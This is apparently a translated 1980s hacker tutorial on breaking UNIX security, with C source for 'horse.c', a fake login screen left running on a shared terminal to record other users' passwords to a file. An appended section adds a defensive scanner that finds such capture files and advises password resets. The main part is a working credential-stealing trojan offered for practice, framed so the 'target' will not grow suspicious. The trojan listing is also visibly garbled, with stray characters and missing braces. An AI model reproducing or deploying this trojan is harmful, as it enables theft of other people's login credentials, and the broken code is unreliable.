Translated by Martin
Preface
----------
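"UNIX security" is an oxymoron. It is a system that is easily broken by brute-force attack. (Most UNIX systems do not hang up after repeated failed logins, and they have many default login names such as root, bin, sys, uucp, etc.) Once you have logged in to the system you can easily subdue it; if you know a little C, you can make the system work for you, completely bypass its security barriers to create your own logins, read anyone's files, and so on.
This article provides some C source code along these lines for you to practice with.
Requirements
You need a valid account on a UNIX system. For best results, use a full version of UNIX (such as 4.2bsd or AT&T System V) running on a real machine (a PDP/11, VAX, Pyramid, etc.). If you can get an account on your school's system, so much the better.
Note
This article was inspired by an article in the April '86 issue of BYTE entitled "Making UNIX Secure." In that article the authors say, "We hope the material we provide is interesting without becoming a 'cookbook for vandals.' We have often deliberately omitted details." Following the general outline of that article, I give examples based on the methods they mention.
Step one: obtaining passwords
All you need is some very basic knowledge of UNIX and C. However, you must have access to a terminal, such as one in the school's computer center.
When you log in to a typical UNIX system, you see something like this: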
Tiburon Systems 4.2bsd / System V (shark)
login: shark
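Password: (not displayed)
The program I provide simulates a login sequence. You run the program on a terminal and then walk away. When unsuspecting people come to log in, their login information is saved to a file and the screen shows "login incorrect".
They are then asked to log in again. The second time is the real login, and this time they succeed. Obviously those people are not very bright.
Create the file 'horse.c' on the system from the source below. Because systems come in different versions, you may need to modify the first 8 lines.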
----- Code Begins Here -----
/* this is what a 'C' comment looks like. You can leave them out. */
/* #define's are like macros you can use for configuration. */
#define SYSTEM " Tiburon Systems 4.2bsd UNIX (shark) "
/* The above string should be made to look like the message that your
* system prints when ready. Each represents a carriage return.
*/
#define LOGIN "login: "
/* The above is the login prompt. You shouldn't have to change it
* unless you're running some strange version of UNIX.
*/
#define PASSWORD "password:"
/* The above is the password prompt. You shouldn't have to change
* it, either.
*/
#define WAIT 2
/* The numerical value assigned to WAIT is the delay you get after
* "password:" and before "login incorrect." Change it (0 = almost
* no delay, 5 = LONG delay) so it looks like your system's delay.
* realism is the key here - we don't want our target to become
* suspicious.
*/
#define INCORRECT "Login incorrect. "
/* Change the above so it is what your system says when an incorrect
* login is given. You shouldn't have to change it.
*/
#define FILENAME "stuff"
/* FILENAME is the name of the file that the hacked passwords will
* be put into automatically. 'stuff' is a perfectly good name.
*/
/* Don't change the rest of the program unless there is a need to
* and you know 'C'.
*/
#include <curses.h>
#include <signal.h>
int stop();
main()
{char name[10], password[10];
int i;
FILE *fp, *fopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^ ]",name);
getchar();
noecho();
printf(PASSWORD);
scanf("%[^ ]",password);
printf(" ");
getchar();
echo();
sleep(WAIT);
if ( ( fp = fopen(FILENAME,"a") ) != NULL ) {
#fprintf(fp,"login %s has password %s ",name,password);
#fclose(fp);
#}
printf(INCORRECT);
endwin();
stop()
{
endwin();
exit(0);
}
----- Source Ends Here -----
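For an administrator, the artifact this program leaves behind is its capture file: each record has the form "login <name> has password <secret>". The scanner below is an added example for finding such records, not part of the original article; the function names and the sample buffer are constructed, and it assumes one record per line.

```c
#include <stdio.h>
#include <string.h>
#define PREFIX "login "
#define MIDDLE " has password "
/* Return 1 if a line has the layout horse.c appends to its capture file,
 * "login <name> has password <secret>"; only the account name is copied out. */
int is_harvest_line(const char *line, size_t len, char *user, size_t ulen)
{
    size_t plen = strlen(PREFIX), mlen = strlen(MIDDLE), i, n;
    if (len < plen + mlen + 2 || strncmp(line, PREFIX, plen) != 0)
        return 0;
    for (i = plen + 1; i + mlen < len; i++) {  /* name and secret non-empty */
        if (strncmp(line + i, MIDDLE, mlen) != 0)
            continue;
        n = (i - plen < ulen) ? i - plen : ulen - 1;
        memcpy(user, line + plen, n);
        user[n] = '\0';
        return 1;
    }
    return 0;
}

/* Scan a buffer line by line (assumption: one record per line); store up
 * to max account names and return the total number of records seen. */
int scan_harvest(const char *text, char users[][32], int max)
{
    char scratch[32];
    int hits = 0;
    while (*text) {
        size_t len = strcspn(text, "\n");
        if (is_harvest_line(text, len, hits < max ? users[hits] : scratch, 32))
            hits++;
        text += len + (text[len] == '\n');
    }
    return hits;
}
/* Constructed sample: contents of a stray file such as FILENAME "stuff". */
static const char SAMPLE[] =
    "login alice has password hunter2\n"
    "remember to mail bob about the login server\n"
    "login dave has password x y\n";
int main(void)
{
    char users[8][32];
    int i, n = scan_harvest(SAMPLE, users, 8);
    for (i = 0; i < n && i < 8; i++)
        printf("credential captured for %s: force a password reset\n", users[i]);
    return 0;
}
```

Every account it reports should have its password changed, since the captured secret was valid when it was typed.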


